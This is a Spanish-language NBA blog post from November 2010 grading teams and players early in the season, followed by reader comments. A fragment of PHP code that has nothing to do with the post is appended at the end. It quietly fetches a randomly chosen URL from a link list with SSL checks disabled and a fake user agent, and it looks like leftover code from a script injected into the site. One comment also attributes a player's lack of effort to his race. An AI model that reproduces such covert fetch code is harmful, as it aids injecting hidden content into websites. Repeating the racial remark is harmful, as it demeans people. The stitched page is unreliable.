Informe #1

08 de November de 2010 por TheDeerHunter

Tras un par de semanas de competición ya es momento de extraer algunas conclusiones. Retomamos hoy nuestro viejo formato de “Informe semanal” aunque lo convertimos en quincenal, en la medida de lo posible. Tiene mucho más sentido.

¿Porqué todos los jugones sonríen igual?

Hay muchos motivos para sonreír siendo aficionado amarillo. Tras la conclusión del campeonato, los Lakers están mostrando más madurez y solvencia que nunca. Sin Bynum y con poco más que pinceladas de Kobe, el equipo de Phil Jackson se ha mostrado intratable. El nivel de Pau, el estado de forma de Odom y la inmejorable adaptación de  las nuevas incorporaciones son la clave para pasar con sobresaliente este cómodo calendario.

De los Lakers podíamos esperar tal cosa, no tanto así de los Hornets, el otro equipo con balance inmaculado que queda a estas alturas. Ni el más optimista podía esperar estos resultados frente a unos rivales nada desdeñables. Una defensa feroz, instaurada sorprendentemente por Monty Williams, el rendimiento (y la salud) de Chris Paul, su gran quinteto y la aportación de Jason Smith son las claves para ser la revelación hasta el momento. Aspectos mejorables: el rendimiento de Thornton (es lo que tiene tener por delante a CP3), la incorporación de Pondexter y la adaptación de Bayless. Están jugando casi con 6 tíos.

El resto de triunfadores de esta quincena serían los Celtics que van a su ritmo (6-1), unos Hawks hasta anoche inmaculados y también los Spurs (4-1 ambos).

Ganarás el pan con el sudor de tu frente

Encabeza la categoría Orlando. Bien podrían estar en la anterior pero nos dejó con muy mal cuerpo el palizón recibido contra Miami. Rashard Lewis no termina de arrancar y sin él es imposible que cumplan con las altas expectativas que manejan.

Para los Heat este inicio no está siendo un camino de rosas. No es razonable pensar que iban a ganar todos los partidos. En fase de adaptación, con Bosh poniéndose en situación y una plantilla corta está dentro de la lógica perder contra los Celtics y contra estos Hornets tan en forma. Que los árboles no nos tapen la visión del bosque. Son el equipo que menos puntos encaja y el segundo con mejor diferencial.

Para los que todavía defienden que el Este es más potente, con estos dos equipos termina todo. ¿Quién nos iba a decir que los Cavs liderarían más allá de un primer partido la Central? Un 3-3 tiene la culpa, por muy meritorio que sea para ellos. Mo Williams junto a Gibson están poniendo la dinamita. Varejao y Hickson por dentro rinden satisfactoriamente. De momento no deja de ser un equipo en el mejor de los casos luchador. El único otro equipo por encima del 50% son los Knicks, con más sombras que luces.

Sin embargo, en el Oeste únicamente hay 4 equipos por debajo del “fifty-fifty”. La terrorífica Northwest está liderada en este instante por Denver penalizados por un calendario complicado. Melo ha conseguido que la rumorología que le envuelve no afecte a su rendimiento y Al Harrington, Afflalo e incluso Shelden Williams están aportando el extra de producción que necesitan. Les siguen de cerca los Blazers, tan sólidos como siempre (5-2)

Además, en el Oeste por encima del 50% tenemos a los sorprendentes Warriors, con un Monta Ellis estelar y una concepción menos bucólico-festiva del juego y también a Dallas. Sólidos y con Nowitzki.

Con 3-3 cierran la categoría Jazz, Thunder, Suns y Kings. Agridulces. El problema es que, como viene siendo habitual estas últimas campañas, un 50% de victorias en el Oeste no te da playoffs.

Se dejaban llevar

Fastidia un poco mencionar a los Grizzlies aquí. Sin Zach la mayor parte de lo que se lleva jugado bastante tienen con aguantar la compostura (3-4 con 5 partidos fuera de casa). Gay está inconmensurable, igual que Conley pero ni Mayo ni Marc terminan de explotar. El problema es más de despachos, que o bien son capaces de vislumbrar una realidad que nosotros no vemos o es que directamente son un puñetero desastre.

En el Este nos vienen decepcionando por encima de todos Bucks (2-5) y Bulls (2-3) y sin embargo a mí me da que es un problema puntual y pronto volverán arriba.

Más difícil lo tienen Nets (2-4), Pacers (2-3), Sixers (2-5) y Detroit (2-5) aunque en todos ellos hayamos visto algún motivo para la esperanza estas dos semanas.

El Carabasas club

El panorama de los Rockets, con Scola a nivel All-Star, Yao y Martin aportando más lo que aporta-aportaba Brooks (¿dos semanas fuera?) es desolador. Parecía que no iban a ganar en la vida, pero anoche lograron estrenarse (los últimos en hacerlo) con los Wolves. Los únicos, por cierto, que todavía defienden peor que ellos. Ya es defender mal.

El otro equipo amigo del oeste es, como no puede ser de otra manera, los Clippers, el equipo crónico de esta categoría desde que se inventó.

En el Este, los Raptors y los Wizards son equipos de los que esperamos poco, pero hay que decir que por momentos ofrecen alguna cosa positiva y algún signo de mejora. Peor lo tiene Charlotte. No hay que matarse demasiado defendiéndoles para que te anoten menos de 90 puntos. Ellos solitos se bastan.

PREMIOS PERIÓDICOS TJNBA:

¿Porqué eres tan bueno?

Llamadnos chauvinistas o lo que queráis pero es momento de sacar pecho por el mayor de los Gasol. 24 puntos, 11 rebotes, 5 asistencias (más todo lo que no se ve) y comprobar cómo funciona su equipo alrededor de él,  son motivos más que suficiente para afirmar con rotundidad que es el mejor jugador de lo que llevamos de campeonato. Guste o no.

Al salir de clase.

A pesar de la ruina que es su equipo, Blake Griffin es de lo poco que no nos decepciona allí. 18 puntos 11 rebotes, 2 asistencias. Como un tiro en su camino al RoY.

La vida puede ser maravillosa.

Por fin, y ya teníamos ganas, estamos viendo a un Emeka Okafor aportando a alto nivel. Fundamental en el mejor equipo defensivo de la liga hasta el momento. Ya que estamos habría que añadir como sorpresas a Belinelli y Jason Smith. Repetimos que son ellos la revelación del campeonato.

Cortocircuitos S.L.

Colectivamente la decepción del año viene siendo la defensa de Adelman, cuando los Rockets se venían caracterizando por lo contrario. Individualmente, con todo el dolor de nuestro corazón, haremos mención a la pareja terrorífica que forman Baron Davis y Randy Foye. Parece claro que sobran en un equipo como los Clippers… y por lo tanto sobra en la liga.

Comenta

8 comentarios a esta entrada

  1. Jabho dice:
    #1

    Sin ganas de dejar de valorar lo que han hecho los Lakers creo que es mucho mas meritoria la trayectoria actual de los hornets. Han jugado 3 partidos en casa y 3 fuera, por 5-2 los lakers. Han jugado contra mejores equipos que los amarillos, todos o casi todos de PO mientras que los Lakers sólo Suns y Porland han sido de PO….

    Creo que calendario ha sido muy favorable con los amarillos hasta ahora, y mucho menos con Hornets, Hawks o Celtics. Valoro más el arranque de temporada de estos 3 que el de los angelinos, lo cual no quiere decir que los Lakers no hayan arrancado fenomenal.

      Citar

  2. Scriers dice:
    #2

    Me cuesta muchi digerir determinadas caidas en picado. Lo de baron davis escuece. Quien le ha visto y quien le ve. Me pregungto cuando es el momento en que pasas de jugador a caqsi exjugador. Que falla antes si cabeza o cuerpo.

      Citar

  3. nacho dice:
    #3

    Baron Davis es un superclase, casi de otra época, y tiene lo que les pasa a los de su raza, una cabeza donde el esfuerzo es un condicionante negativo, y sin motivación… pues eso. No me viene a la cabeza ahora ningún ejemplo de baloncestistas, pero en el fútbol tenemos varios… De La Peña, LeThissier, Guti… es decir, jugadores de resúmenes. Capaces de lo mejor y… es decir Curros Romero.

      Citar

  4. HisRoyalAirness dice:
    #4

    Es cierto lo de New Horleans, tiene mucho más merito por ser un equipo de menor nivel y haber tenido rivales más serios. Hasta ahí de acuerdo.
    Pero es que los Lakers están jugando sin su center titular y con el mejor jugador de la liga a medio gas; y aún así arrasan. Cualquier equipo con esas carencias se resentiría muchísimo más.

      Citar

  5. sayim dice:
    #5

    Fantástica noticia la reedición de los informes, se echaban de menos. Gracias por el esfuerzo creciente en el seguimiento de la liga

    Un saludo

      Citar

  6. Denise dice:
    #6

    Por ahora, me están decepcionando los Bulls, los Rockets y los Thunders.
    Las sorpresas, Hornets y Hawks claramente

      Citar

  7. sr. Lagarto dice:
    #7

    Estimados amigos:

    Quiero felicitaros una vez más por el excelente trabajo diario que hacéis en el blog.

    Un cordial saludo.
    Lagarto.

      Citar

  8. LEmontus dice:
    #8

    uno de los mejores artículos desde que entré

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>